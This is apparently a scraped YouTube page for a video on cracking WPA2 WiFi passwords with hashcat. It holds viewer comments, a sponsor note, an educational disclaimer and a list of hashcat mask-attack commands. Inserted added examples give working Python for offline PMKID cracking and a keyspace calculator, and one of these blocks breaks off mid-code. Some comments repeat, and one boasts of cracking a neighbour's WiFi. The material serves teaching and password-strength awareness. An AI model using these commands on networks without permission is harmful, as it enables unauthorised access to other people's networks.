Specifically, you need to use something like VMware ESXi, but that is not something you would normally use at home. He is obviously referring to something like VMware Workstation and/or Hyper-V running on top of Windows. ESXi would be a dedicated machine running VMs, not Windows.
@smudge1619 Actually, he did not specify a hypervisor. He merely said you cannot get access to a GPU from a VM, which is incorrect. And plenty of people run ESXi at home.
@TheDainerss I understand, I was filling in your comment with constructive examples/specifics for people who don't know what would actually work, since you did not give examples and just said some hypervisors can.
I love the video and the application. I have a laptop I'm wanting to put hashcat on, but I seem to be having a problem getting it to recognize the program. Have you done an installation video? I have Windows 10. Keep up the great content.
I was told by an IT guy in the Navy that using those tools he could crack all the passwords in a week. He was a geek who lived in California and could drive to work and back only using people's WiFi when he worked as a Google network engineer.
Having a complex password is nice and all, but not when you want other people to remember it as well who aren't necessarily tech savvy. I think the real problem is that we ask real people to have to input passwords in the first place. We need better forms of authentication that don't require us to have to dumb down passwords so people can remember them. WPS was a good first attempt, but it never really evolved in the way that it needed to solve these kinds of problems.
Fun Fact: "Meraki" means "loving what you do" in Greek. In a greek (mis)interpretation, the product's name would mean "Cisco's love on what it's doing"
I agree that WPS should be disabled in the first place, but WPS can be "delayed" - for example 3 incorrect tries locks WPS for 5 min or more. Then brute force attacks become useless - I meant the brute force PixieWPS method.
You normally don't try to brute force against the router or whatever. If someone connects to the WiFi, the hash gets submitted in cleartext. With your computer you can then read out the hash and start brute forcing offline.
Hi David, I only just came across your channel and I subbed because the ethical hacking you teach is just brilliant! I've learned so much in 48 hours. I'd like to ask, how does one choose a password cracking length that is under the 8 character limit? It states during the attack that you can only have min 8 to max 18. I've looked at the hashcat website guide but cannot seem to locate a command that allows for an attack under 8 characters.
If it's just straight brute force, there's no way for you to get *that* lucky - 40s on an "impossible" crack? Is the time estimate flawed? Or does it use something else than just going through all permutations randomly / in order?
This was a great video you put together... I have always had problems with wordlists, creating my own, so big and so small, number one. The biggest problem for me is trying to find a good GPU that is not expensive. Because of all the mining going on with Bitcoin, all the GPUs are very expensive. What would be a good GPU to have nowadays for cracking these files? Any suggestions, let me know, or a site where I could buy them.
I recall seeing that story out of Israel and it was very interesting. Fortunately (or unfortunately, depending on who you are) in my part of the world (one of the Western European countries), most if not all routers come with a random, alphanumeric, 10+ character default password. For all intents and purposes, this is essentially 'uncrackable' in any reasonable timeframe.
In 2012 I found a buried extension cord from my yard going to my neighbor's house. I unplugged it and while waiting for him to come home to confront him, I decided to attempt to hack his wifi. I pulled a very old Pentium 4 PC out of the closet and installed Kali. As a novice, I had his wifi cracked in a few hours attacking his WPS with aircrack-ng. I had free internet for the next year and do not feel guilty one bit. My electric bill dropped $80 a month and I am certain he stole my power for about the same time I borrowed his internet.
Have you talked about or would you talk about diceware as a password generation scheme? In particular getting significantly longer than 10 characters versus tossing in some special characters and the like…
What I am interested in is how. What is happening in the background. Is each potential password being hashed, and the hash checked against the hash which was scraped from the Wi-Fi network to see if it matches? If so, is this only feasible due to modern GPUs being so powerful? A deep dive into the actual process behind this would be very interesting to me.
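The question above is exactly the loop hashcat runs. The following is an added example, not hashcat's code and not from the video: it derives the PMK from a candidate passphrase (PBKDF2-HMAC-SHA1, 4096 rounds, the SSID as salt), recomputes the PMKID that an AP discloses in the first EAPOL frame, and compares it with the captured one, using the hashcat 22000 PMKID line format shown in the COMMANDS list. The capture is constructed (made-up SSID `ExampleNet`, locally administered MACs, a known 8-digit PSK) so it runs fully offline; nothing ever talks to a router, which is also why a retry delay on the access point does not help once the frame has been recorded.

```python
"""Offline WPA2 PMKID check, the way hashcat mode 22000 evaluates each candidate.

Added example; not hashcat's code and not from the video. The capture below is
constructed: a made-up SSID, locally administered MACs and a known passphrase,
so the whole thing runs offline. Nothing on the router is involved once the
PMKID (or a 4-way handshake) has been recorded.
"""
import hashlib
import hmac
import itertools
import string


def pmk_from_passphrase(passphrase, ssid):
    """PMK (= PSK for WPA2-Personal): PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32).
    The 4096 iterations are the cost per candidate; that is what the GPU spends its time on."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk, mac_ap, mac_sta):
    """PMKID = HMAC-SHA1(PMK, "PMK Name" || AP MAC || station MAC) truncated to 128 bits.
    The AP puts this in the RSN IE of EAPOL message 1, so one frame is enough to capture it."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def hc22000_pmkid_line(pmkid_bytes, mac_ap, mac_sta, ssid):
    """hashcat 22000 PMKID entry: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_HEX***
    (the three empty fields carry ANONCE, EAPOL frame and message-pair for type 02 handshake entries)."""
    return f"WPA*01*{pmkid_bytes.hex()}*{mac_ap.hex()}*{mac_sta.hex()}*{ssid.encode().hex()}***"


def parse_hc22000(line):
    """Split a type 01 line back into its parts; type 02 (EAPOL) lines need a MIC check not shown here."""
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA":
        raise ValueError("not a hc22000 line")
    if f[1] != "01":
        raise NotImplementedError("only PMKID (type 01) entries are handled here")
    return {
        "pmkid": bytes.fromhex(f[2]),
        "mac_ap": bytes.fromhex(f[3]),
        "mac_sta": bytes.fromhex(f[4]),
        "ssid": bytes.fromhex(f[5]).decode(),
    }


def crack(line, candidates):
    """The inner loop of the attack: for every candidate derive the PMK, recompute the PMKID,
    compare with the captured value. Returns the matching passphrase or None.
    Candidates outside 8..63 characters are skipped, as hashcat does for WPA modes."""
    h = parse_hc22000(line)
    for cand in candidates:
        if not 8 <= len(cand) <= 63:
            continue
        if pmkid(pmk_from_passphrase(cand, h["ssid"]), h["mac_ap"], h["mac_sta"]) == h["pmkid"]:
            return cand
    return None


def digit_candidates(length):
    """What a ?d?d...?d mask enumerates: every digit string of that length
    (plain lexicographic order here; hashcat's own ordering differs)."""
    for tup in itertools.product(string.digits, repeat=length):
        yield "".join(tup)


# Constructed capture (not real traffic): made-up SSID, locally administered MACs, known 8-digit PSK.
SSID = "ExampleNet"
MAC_AP = bytes.fromhex("020000000001")
MAC_STA = bytes.fromhex("020000000002")
TRUE_PSK = "00000042"
CAPTURED_LINE = hc22000_pmkid_line(
    pmkid(pmk_from_passphrase(TRUE_PSK, SSID), MAC_AP, MAC_STA), MAC_AP, MAC_STA, SSID
)

if __name__ == "__main__":
    print(CAPTURED_LINE)
    print("recovered:", crack(CAPTURED_LINE, digit_candidates(8)))
```

Each candidate costs one PBKDF2 run of 4096 HMAC-SHA1 iterations; that fixed cost, multiplied by the keyspace, is the whole economics of the attack, and it is why a GPU doing millions of SHA1 blocks in parallel changes the picture while the router itself never sees a single attempt. The `pmk_from_passphrase` function can be checked against the IEEE 802.11 test vector (passphrase `password`, SSID `IEEE`).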
I find this interesting, moreover because the default password on a Sky router was 8 digits made up of upper, lower and numericals; however, when I tested this... simple method really, I had my password in front of me after about 8 minutes. Long story short, if someone wants into your Wi-Fi bad enough there's no real stopping it unless you manually set your password to 16+ digits, and most people overlook this as they are convinced that upper/lower/numerical passwords are so strong and secure, until they see how easy a brute force can be!
David - Thank you! This is such a helpful video. I appreciate all of the content and knowledge you're passing along in cyber security. I did have a question: how do you set up the Alfa WiFi adapter for WSL2 running on Windows 11?
Good luck getting WSL to recognize any USB devices. After some googling, some places say it's possible. Others say it can't. I tried, and have settled on USB devices don't pass through to Kali on WSL. Easy solution: Just use a virtual machine like VMware and install Kali on it for network hacking. Use WSL2 Kali for everything else... which ultimately means having 2 Kali machines, which then out of laziness defaults to just using the virtual machine Kali and never touching WSL again. TLDR: Ditch WSL and stick to a VM to keep it simple.
To my knowledge, MAC addresses are essentially hashed to IP addresses, so someone with the same IP address as a prohibited MAC address could possibly exploit this. A better way of handling this may be through using data analytics to determine whether a connection involves normal Internet traffic or has malicious intent, or something like CloudFlare's DDoS protection.
Hello, I have a question. Since even more complex passwords can be cracked, is it worth adding MAC filtering on the router to secure yourself in this way?
Big thanks to Cisco Meraki for sponsoring this video! Learn how to secure hybrid networks so you can stop these kinds of attacks: davidbombal.wiki/meraki
Disclaimer: This video is for educational purposes only. I own all equipment used for this demonstration. No actual attack took place on any websites. Only use the tools demonstrated in this video on networks you have permission to attack.
// MENU //
00:00 ▶ Intro
02:17 ▶ Real world example
02:58 ▶ Hashcat file format
03:28 ▶ Handshake capture (old mode) 10 digits
03:57 ▶ GPU setup
04:12 ▶ Handshake capture (old mode) 10 digits (cont'd)
06:21 ▶ Handshake capture (new mode) 8 digits
07:57 ▶ Handshake capture (old mode) 8 digits
09:07 ▶ Incrementing digits
11:55 ▶ Built-in charsets
12:22 ▶ Cracking alphanumerical passwords
18:42 ▶ Using wordlists
19:00 ▶ Conclusion
// Previous Videos //
WiFi WPA/WPA2 vs hashcat and hcxdumptool: th-cam.com/video/Usw0IlGbkC4/w-d-xo.html
Kali Wifi Adapters: th-cam.com/video/5MOsY3VNLK8/w-d-xo.html
Old method using airmon-ng: th-cam.com/video/WfYxrLaqlN8/w-d-xo.html
Old method using GPUs: th-cam.com/video/J8A8rKFZW-M/w-d-xo.html
// COMMANDS //
Check GPU:
hashcat.exe -I
10 digits (Old Method):
hashcat.exe -m 2500 -a 3 10digit.hccapx ?d?d?d?d?d?d?d?d?d?d
Increment WPA2 digits (Old Method):
hashcat.exe -m 2500 -a 3 10digit.hccapx --increment --increment-min 8 --increment-max 20 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
8 digits (New Method):
hashcat.exe -m 22000 8-digit-wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d
10 digits (New Method):
hashcat.exe -m 22000 10-digit-wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d
10 digits and alpha (New Method):
hashcat.exe -m 22000 10-digit-letters-wpa2.hc22000 -1 ?d?l?u -a 3 ?1?1?1?1?1?1?1?1?1?1
Increment digits (New Method):
hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
Increment digits and alpha (New Method):
hashcat.exe -m 22000 10-digit-letters-wpa2.hc22000 -1 ?d?l?u -a 3 --increment --increment-min 8 --increment-max 12 ?1?1?1?1?1?1?1?1?1?1?1?1
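The masks above decide how many candidates hashcat has to push through PBKDF2, and the estimate hashcat prints is simply that count divided by your hash rate. The following is an added example, not hashcat's code and not from the video: a small parser for hashcat's mask syntax (built-in charsets `?l ?u ?d ?h ?H ?s ?a ?b`, custom charsets given as `-1 ?d?l?u`, `--increment` with `--increment-min`/`--increment-max`) that computes the keyspace for each command in the list and the worst-case time to exhaust it. The 1 MH/s rate is an assumption; substitute the number your own `hashcat -b -m 22000` benchmark reports. The `min_len` handling reflects that hashcat's WPA modes skip candidates shorter than 8 characters, which is why an `--increment-min` below 8 gets you nothing in mode 22000.

```python
"""Keyspace and time-to-exhaust calculator for hashcat mask attacks (-a 3).

Added example, not part of the video or of hashcat. It models hashcat's built-in
charsets, -1..-4 custom charsets and --increment, as used in the COMMANDS list.
"""
import string

# hashcat's built-in charsets (see "Built-in charsets" in `hashcat --help`)
BUILTIN = {
    "l": string.ascii_lowercase,                                           # 26
    "u": string.ascii_uppercase,                                           # 26
    "d": string.digits,                                                    # 10
    "h": string.digits + "abcdef",                                         # 16
    "H": string.digits + "ABCDEF",                                         # 16
    "s": " " + string.punctuation,                                         # 33
    "a": string.ascii_letters + string.digits + " " + string.punctuation,  # 95
    "b": "".join(chr(i) for i in range(256)),                              # 256
}

WPA_MIN_LEN = 8  # WPA/WPA2 passphrases are 8..63 chars; hashcat's WPA modes skip shorter candidates


def expand(spec, custom=None):
    """Set of characters covered by a charset spec such as '?d?l?u' or 'abc?d'.

    Custom charsets (the -1 .. -4 options) are passed as {"1": "?d?l?u"} and may
    themselves use built-ins. Duplicates collapse, as they do in hashcat.
    """
    custom = custom or {}
    chars = set()
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key == "?":                      # '??' is a literal question mark
                chars.add("?")
            elif key in BUILTIN:
                chars.update(BUILTIN[key])
            elif key in custom:
                chars.update(expand(custom[key], custom))
            else:
                raise ValueError(f"unknown charset ?{key}")
            i += 2
        else:
            chars.add(spec[i])                  # any other character is a literal
            i += 1
    return chars


def mask_positions(mask, custom=None):
    """Per-position charsets of a mask: '?d?d' -> [digits, digits], 'a?l' -> [{'a'}, lowercase]."""
    positions = []
    i = 0
    while i < len(mask):
        step = 2 if mask[i] == "?" and i + 1 < len(mask) else 1
        positions.append(expand(mask[i:i + step], custom))
        i += step
    return positions


def keyspace(mask, custom=None, increment=None, min_len=1):
    """Number of candidates hashcat generates for a mask.

    increment=(lo, hi) models --increment --increment-min lo --increment-max hi:
    the mask is cut to every length lo..hi (never beyond the mask itself) and the
    per-length keyspaces are summed. Lengths below min_len are skipped, which is
    what happens in WPA modes with min_len=WPA_MIN_LEN.
    """
    pos = mask_positions(mask, custom)
    if increment is None:
        lengths = [len(pos)]
    else:
        lo, hi = increment
        lengths = range(lo, min(hi, len(pos)) + 1)
    total = 0
    for n in lengths:
        if n < min_len:
            continue
        size = 1
        for charset in pos[:n]:
            size *= len(charset)
        total += size
    return total


def seconds_to_exhaust(candidates, rate_hps):
    """Worst case: time to walk the entire keyspace at rate_hps hashes per second.

    This is the figure hashcat reports as its estimate. It is not the expected time
    to hit the password: on average the hit lands halfway through, and a candidate
    that sits early in the enumeration falls out almost immediately.
    """
    return candidates / rate_hps


def human(seconds):
    for unit, size in (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.1f} seconds"


if __name__ == "__main__":
    RATE = 1_000_000  # assumed 1 MH/s; replace with your own `hashcat -b -m 22000` figure
    alnum = {"1": "?d?l?u"}
    cases = [
        ("8 digits", "?d" * 8, None, None),
        ("10 digits", "?d" * 10, None, None),
        ("10 alnum (-1 ?d?l?u)", "?1" * 10, alnum, None),
        ("8..18 digits, --increment", "?d" * 18, None, (8, 18)),
        ("8..12 alnum, --increment", "?1" * 12, alnum, (8, 12)),
    ]
    for label, mask, custom, inc in cases:
        n = keyspace(mask, custom, inc, min_len=WPA_MIN_LEN)
        print(f"{label:28s} {n:>26,d} candidates  ~{human(seconds_to_exhaust(n, RATE))}")
```

Two things fall out of the numbers. Eight digits is 10^8 candidates, under two minutes at 1 MH/s, while ten mixed-case alphanumerics (`-1 ?d?l?u`) is 62^10, which is thousands of years at the same rate; length and charset multiply, so adding characters beats adding symbol classes. And the `--increment` total is dominated by its longest length, so `--increment-max` is what sets the bill.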
// SOCIAL //
Discord: discord.com/invite/usKSyzb
Twitter: twitter.com/davidbombal
Instagram: instagram.com/davidbombal
LinkedIn: www.linkedin.com/in/davidbombal
Facebook: facebook.com/davidbombal.co
TikTok: tiktok.com/@davidbombal
TH-cam: th-cam.com/users/davidbombal
// MY STUFF //
Monitor: amzn.to/3yyF74Y
More stuff: www.amazon.com/shop/davidbombal
// SPONSORS //
Interested in sponsoring my videos? Reach out to my team here: sponsors@davidbombal.com
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
Always love your videos david, keep it up!
Windows 11 safe mode with networking is not letting me use the internet or connect to wifi. I can not fix my computer without an Internet connection. Please help.
How does Kali Linux fit in here? I waited the whole video for the Kali part, but this was all done in Windows.
I have been following you, David, for 2+ years. Please also look at my comment. A decent fan can expect a single suggestion from your valuable time. My mobile is being spied on by someone, as USB debugging is turned on automatically after the phone restarts automatically.
Thanks ✌️
As someone who works in IT for a large enterprise, I think too many tech and security companies focus too heavily on password policies. Specifically ones that are way too complex for the average user. So much that they end up either writing it down on a piece of paper or reuse the same password everywhere. The real threat and issues I’ve faced with many users is social engineering.
The focus should be on social engineering and user training.
Social engineering is a huge threat to business and home users in the real world.
Not exactly on topic but my 2 cents.
exactly!
That has been my view as well. If my password has held up for the past 90 days, why have me change it to something that may be easier to guess/crack. Looking for anomalous user activity seems like the place to put some focus. If user starts to try to access network shares they have not before (failures) , or outbound packets are out of normal bounds then take action.
Also MFA. Every company should have MFA as standard.
Every company should have MFA if they want cyber insurance. We just had a doctor leave his laptop behind, and we were able to just open it from sleep and get right in. I also found his OS was 1903 and, seeing the security aspect sucked, updated the system.
But where did you run this program, and from what device was it able to capture the WiFi?
Did you just need to see the computer on the network and then you jacked up in the computer?
You just ran the scan and captured the WiFi code from just running the program without actually being on the network?
I agree. I fell for it a couple of times, clicking on emails mimicking my company IT address. Now I always check the sender email address, and even then I don't really click on emails not related to my daily tasks or periodic IT routine maintenance.
It got me thinking about all those miners out there and hashing. I always imagined someone tricking people into "hashing" with millions of GPUs around the world for nefarious reasons the password cracking power it can have would be immense! Crazy. Great video subbed.
I've learned more from this show than I have from years of ongoing technical certification, thank you.
Very happy to hear that!
@davidbombal I'm not kidding, it provides a perspective beyond what I learned in training. To some extent we get old school text in training; nothing can put that in perspective more than a real world example like those you provide.
Same here
@davidbombal You shouldn't be. It shows that his country is failing to properly provide the correct education. Meanwhile you're providing the means to kids who in the current generation do nothing but play computers and have the worst behavioral rates. A means to further worsen that behaviour.
@TheRukaslover cope
It's also good practice to change the SSID of home setups as the standard SSID will identify the supplier which can identify the default passwords complexity.
You mean "admin-admin" or "admin-password" (common default user-passwords)
@mitchellduncklee7182 I think he means more like the known character set and character count of the WiFi PSK (pre-shared key/password). An example would be a Spectrum modem/WiFi/router with an SSID of MySpectrum using a default PSK of 8 characters that only consist of uppercase letters and numbers.
If you are going to the trouble of changing the PSK, I agree the SSID should be changed as well.
That is a really good point about the default password of the router, though changing the SSID will likely not hide anything at this point. After they crack your WiFi PSK and gain access to your network, the next target could be the router but more likely unsecured devices on your network are of more value.
In all fairness, any WiFi scanner worth its salt that can show MAC addresses regardless of SSID will usually show the firmware vendor either way ;)
@klontjespap Depends on who reserved the OUI, but fair enough.
I guess you can slow someone down, or confuse them that way. Like, use a SSID pattern of some other familiar device manufacturer.
I really admire your commitment to creating these videos , thanks a lot David .
Thank you David , You have a true talent at explaining almost anything in a step by step , methodic process leaving nothing out and explaining the reasoning , that makes learning , what sometimes can start as a complex task so much easier to comprehend . I appreciate the time and knowledge you put into your channel , you are a great teacher . so many of your videos should be shown to every high school student worldwide for security awareness...Thanks Again . great work.
Perfect way to end the night another bombal upload!! Thanks for the awesome content and tutorials as always!!
Thank you! Glad you are enjoying the videos :)
All that really matters is the password length.
To brute force, you need to calculate the number of possibilities per individual characters, to the power of the length of the password.
For example a 3 digit password using 240 possibilities per character gives 13 million possibilities.
But a 4 digit password using only 72 possibilities per character gives 26 million possibilities.
Yeah, multilingual passphrases would be super"funny" to try to brute force. 15000^7 for example. Easy to remember, fast to write, pretty impossible to crack.
What about the handshake method? Am I safe if I use a 60 character length password key?
is it me or does he have a new monitor in every video. Love the stuff David produces, learning so much.
Is that a Samsung? Looks even wider.
The problem is balancing security and convenience. Nobody wants a 12-14 digit WiFi password with random characters and numbers
There must be a way to lock the Wi-Fi router down for a few minutes after 3 failed attempts.
It doesnt need to be random, 14 digits will be enough
It's not hard to make a 25 char pass with symbols, caps and numbers that is simply a sentence/word. For you lazy ppl, that is how hackers get in.
@Mehwhatevr Huh? He wasn't constantly trying to log in... he is brute forcing the hashed handshake.
I use a password with 20 random characters and numbers. And for the guest I have a QR code on the door
Like you mentioned, you might get lucky and get the password cracked in seconds or minutes, even when hashcat says something like > 10 years. The thing that hashcat is calculating there is your hashing rate, and the total number of permutations in the keyspace. The estimate is how long it will take hashcat to burn through the entire keyspace, not the estimated amount of time to find the password.
Well put
David, your videos are great and to the point, I am glad you are not sipping coffee 😂😂😂. I have been in IT since 1967 (I know it's a long time); this environment has changed so much. I used to work on troubleshooting the COBOL F compiler for IBM; I was able to write in machine language. I used to modify the machine code on the punch cards to screw with the guys' code so it would do something else rather than what the program was coded for, as a joke. I am now taking up ethical hacking to learn how hackers penetrate a network so I could help my clients avoid potential problems. This environment is so complex now but great to work with, and I enjoy every minute of it. You add so much value to what I am learning and enhancing my knowledge, thank you very much for your videos.
The cracking speed is amazing!! Would you make a video using Cloud GPU??
This video is so helpful for people like myself trying to get into cyber security.
Thank you very much Mr. Bombal, this is the best video on TH-cam and the entire internets of how to do the real thing.
I just took a class last semester on Ethical Hacking and I've learned more watching your videos than I did all semester. I still have so many questions and I wish I had friends that did this stuff so I could learn more.
Thank you David. I'm a total noob to this stuff and your videos are really exciting/motivating me to learn.
Thanks!
Very good information and instruction, appreciate the content 🙏🏼 cheers mate.
always love Davids Channel. very very Informative and interesting.
That #ad was so smoothly squeezed in there I barely understood what was going on when it started :'D bro... Well done!
You don't need a lengthy complex password. Just use 3 unrelated words like your dog's name + your favorite food + your favorite song. Then capitalize every other letter and add 1 or 2 symbols in between the words. Easy to remember - impossible to brute force, impossible with a dictionary attack too.
For simplicity, the most important PW I use is a simple sentence of only 6 words in a foreign language with 2 misspellings and one incomplete word. That's easy to remember, as is one other which is just a mathematical formula containing a notation error. About 25 years ago, the Gov't. dropped its case against PGP. I'm told that this occurred as the lawyers were actually walking through the courtroom doors. I asked a mathematician friend about why they would do that. He replied, "Why do you think that decryption can only occur with discovery of the 'key' or that, if discovery were required, that it could only be achieved by brute force." He refused to elaborate and now he's dead (natural causes).
Great tutorials David! Keep them coming!
Great video David! Thank you so much.
Thanks boss. I need more of this. Buying an offensive security pack is expensive. Your video helps a lot.
This is the first time I've seen one of your videos and the very first thing I notice after some minutes is that it might be useful for you to put your camera above your PC. It feels quite stressful that you look to the side every few seconds.
Good video tho ^^ I'm halfway in and I'll probably watch until the end.
Thanks Dear David Sir for all this effort. We really Enjoy your Pen testing Tutorials. And we've seen a lot in cracking Passwords... How about we go a lil bit deeper into attacking devices. I'm sooo down into putting hands into that case though. By the Way Thanks again For all This lit Stuff... Blessings 🕊❤🤗
Great suggestion!
It's always a delight to see your content... always gets me pumped up...!! Keep on rocking!! Love your videos.
Manufacturers should simply add a retry delay, or retry limit.
Even a 1 second retry delay is enough to beat brute-force attacks, without users noticing any delay. Even 8 digits gives you an average of 1.5 years minimum.
Retry delay only works if the computer is actively trying to connect with each attempt, my understanding is that those are recorded packets from the router that can be obtained without the target even knowing, and then cracked away from the device to retrieve the password.
There are some caveats to this method of cracking though, most of the time pure brute force is terribly inefficient, and the passwords he used were set lengths, only numeric, or started at a relatively low "number" in the brute force list (starting with a 0 as the first character for example)
A pure brute force over all possible lengths up to just 12 and alphanumeric will take a pretty long time, not even considering adding special characters
@cavemanthog And then he will say that we use easy passwords to decrease the time required for the demonstration.
@cavemanthog Yes, you're right. Cracking WPA handshakes is done offline. So here, it's basically defending against handshake captures and de-auth attacks (and even for that, a hacker could just monitor wireless traffic waiting for one). Maybe using certificates to authenticate on the network. But for regular domestic use, you usually don't do that. You can also put MAC address filtering in place, but that's easy to spoof... It can be tedious to manage MAC addresses every time you need to connect a new device, or if the one who administers the home network is not there. But once again, MAC address filtering is not really reliable; you can easily analyze the traffic and get the MAC address from the wireless frame. So for WPA wireless network security, either use strong password policies or use certificates, but then again, it's restricted until authorization.
That's not how this works. You already have the encrypted password (the hash) and then you are trying to decrypt the password, which takes time.
I’m still a Linux newbie on Manjaro and I’m just starting to learn code. However, I found this totally fascinating.
you are the most honest person i have seen thank you bombal keep going
Thank you, I appreciate that 😀
As always thank you for knowledge you impart on us
Just found ur channel. Very informative. New sub!
Thank you for clearing up some questions I had with hashcat. One question though, is running hashcat on a GPU harsh on the hardware?
If a laptop then yes, it's harsh; if a PC then it depends on the cooling.
It can also be run on the CPU instead of the GPU. I believe when run on Kali it's CPU by default because Linux doesn't like graphics cards.
@jesseclutterbuck6617 :D
4:21 This is incorrect, you can 100% gain direct access to a GPU from a virtual machine depending on the hypervisor you use.
Specifically, you need to use something like vmware ESXi but that is not something you would normally use at home. He is obviously referring to something like vmware Workstation and/or Hyper-v running on top of Windows. ESXi would be a dedicated machine running vms, not Windows.
@smudge1619 Actually he did not specify a hypervisor. He merely said you cannot get access to a GPU from a VM, which is incorrect. And plenty of people run ESXi at home.
@TheDainerss I understand, I was filling in your comment with constructive examples/specifics for people who don't know what would actually work, since you did not give examples and just said some hypervisors can.
Nice video and very informative..will sure try this.
Hello, nice video, first time watching you. If you record your screen very often, why not use a capture device and not stress out your GPU?
Thanks Mr. Bombal your videos everything is bum 💥
Idk why and idk how I am getting recommended these videos, but ye thank God bro
Just a comment to support the channel. Love the content.
Best and clear explanation , thank you.
Hello David, GREAT video. I do have one question. Is there a way to modify the optimizers being used on hashcat?? greetings!!
I love the video and the application. I have a laptop I’m wanting to put hash at on but I seem to be having a problem of getting it to recognize the program. Have you done an installation video? I have windows 10. Keep up the great content.
Just found your site, much better than "others" out there, think I'll take a quick look over your previous ones. Thanks for your work 👍🏻
David with his super computer cracks passwords in 40 seconds.
Me with my old PC, in 40 days :p
Love seeing RGB GPUs. Great Content as always 💥
The best channel about computers ever.
@upwardhacks what?
I was told by an IT guy in the navy that using those tools he could crack all the passwords in a week. He was a geek that lived in California and could drive to work and back only using people's wifi when he worked as a Google network engineer.
Yeah, good idea, put all your data on other people's routers! Why didn't I think of that!
Having a complex password is nice and all but not when you want other people to remember it as well who aren't necessarily tech savvy. I think the real problem is that we ask real people to have to input passwords in the first place. We need better forms of authentication that don't require us to have to dumb down passwords so people can remember them. WPS was a good first attempt but it never really evolved in the way that it needed to solve these kinds of problems.
Fun Fact: "Meraki" means "loving what you do" in Greek. In a greek (mis)interpretation, the product's name would mean "Cisco's love on what it's doing"
Thanks and appreciation to the professor David
You're welcome!
I agree that WPS should be disabled in the first place, but WPS can be "delayed" - for example 3 incorrect tries locks WPS for 5 min or more. Then, brute force attacks become useless - I mean the brute force PixieWPS method.
You normally don't try to brute force against the router or whatever. If someone connects to the wifi the hash gets submitted in cleartext. With your computer you can then read out the hash and start brute forcing offline.
Sir, you are DOPE ! Instant sub !
Thank you!
Okay, my tech detox is over.
Starting to learn from Mr. DB again 😜💯✌️
Hey, how can I get the 10-letter/digit file thing?
Hi David, I only just came across your channel and I subbed because the ethical hacking you teach is just brilliant! I've learned so much in 48 hours.
I'd like to ask, how does one choose a password cracking length that is under the 8 character limit?
It states during the attack that you can only have min 8 to max 18.
I've looked at the hashcat website guide but cannot seem to locate a command that allows for an attack under 8 characters.
That's why having a low-range router is a good idea. The signal is just not strong enough to go out of your house or through a few walls.
I miss the old WPS attack. Those were the days.
Sir your editing is so professional
Thanks for the video, it's awesome. I wanna learn to program; which language is the best to learn?
If it's just straight brute force, there's no way for you to get *that* lucky - 40s on an "impossible" crack? Is the time estimate flawed? Or does it use something else than just going through all permutations randomly / in order?
Can this be done also with integrated Wi-Fi card instead of external adapter?
I'm surprised I haven't seen you do a video on airegeddon
Thanks, would love an explanation from you on hashcat rules and hybrid wordlists.
Loved it. Thank you !
awesome content. Keep up the great work
3:15, which video from the description is the one that describes how to capture this information please?
Here you go: th-cam.com/video/Usw0IlGbkC4/w-d-xo.html
@davidbombal Thank you, I'm an idiot. Also, do you have SA heritage? I swear that accent sounds super local!
This was a great video you put together... I have always had problems with word lists. Creating my own, so big and small, is number one. The biggest problem for me is trying to find a good GPU that is not expensive. Because of all the mining going on with Bitcoin all the GPUs are very expensive. What would be a good GPU to have nowadays for cracking these files?
Any suggestions, let me know, or a site where I could buy them.
Buy high end gaming laptop
Where do you get the file from? Also nice vid.
I recall seeing that story out of Israel and it was very interesting.
Fortunately (or unfortunately, depending on who you are) in my part of the world (one of the Western European countries), most if not all routers come with a random, alphanumeric, 10+ character default password. For all intents and purposes, this is essentially 'uncrackable' in any reasonable timeframe.
and then 20% of the people change them to their telephone number or something easy to remember, IF they have the skills
In 2012 I found a buried extension cord from my yard going to my neighbor's house. I unplugged it and while waiting for him to come home to confront him, I decided to attempt to hack his wifi. I pulled a very old Pentium 4 PC out of the closet and installed Kali. As a novice, I had his wifi cracked in a few hours attacking his WPS with aircrack-ng. I had free internet for the next year and do not feel guilty one bit. My electric bill dropped $80 a month and I am certain he stole my power for about the same time I borrowed his internet.
Great video… extremely thorough!!!
I'd love to see a link to the referenced article in the video description
Really interesting information.
Thx for sharing it with us.
(Will change to WPA3 and make a longer password)
Have you talked about or would you talk about diceware as a password generation scheme? In particular getting significantly longer than 10 characters versus tossing in some special characters and the like…
Sir, what do you mean "Be careful WPS you probably gonna wanna disable that", is that the WPS office tool?
I saw my neighbor's phone on my wifi one day, now I use a whitelist of MAC addresses. Rekt.
What I am interested in is how.
What is happening in the background.
Is each potential password being hashed, and the hash checked against the hash which was scraped from the Wi-Fi network to see if it matches?
If so, is this only feasible due to modern GPUs being so powerful?
A deep dive into the actual process behind this would be very interesting to me.
You pretty much nailed it on the head. :)
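The two threads above (the retry-delay discussion, and the question of whether each candidate is hashed and compared against the value taken off the air) describe the same thing. This added example, which is not code from the video, shows the offline check in Python using the PMKID variant of the attack, because it is the shortest to write down: the PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes) and the PMKID is the first 16 bytes of HMAC-SHA1(PMK, "PMK Name" || AP MAC || STA MAC), both per IEEE 802.11i. The 4-way-handshake (EAPOL/MIC) variant the video cracks differs only in the comparison step, not in the passphrase-to-PMK work that dominates the cost. The SSID, MAC addresses and the "captured" PMKID are constructed here for the demo, and the mask engine supports only the built-in `?d`, `?l`, `?u` charsets, not hashcat's `-1` custom charsets.

```python
"""Offline WPA2 passphrase recovery against a captured PMKID (added example)."""
import hashlib
import hmac
import itertools
import string

# Built-in hashcat charsets used by the masks in the video (?d, ?l, ?u).
CHARSETS = {"d": string.digits, "l": string.ascii_lowercase, "u": string.ascii_uppercase}


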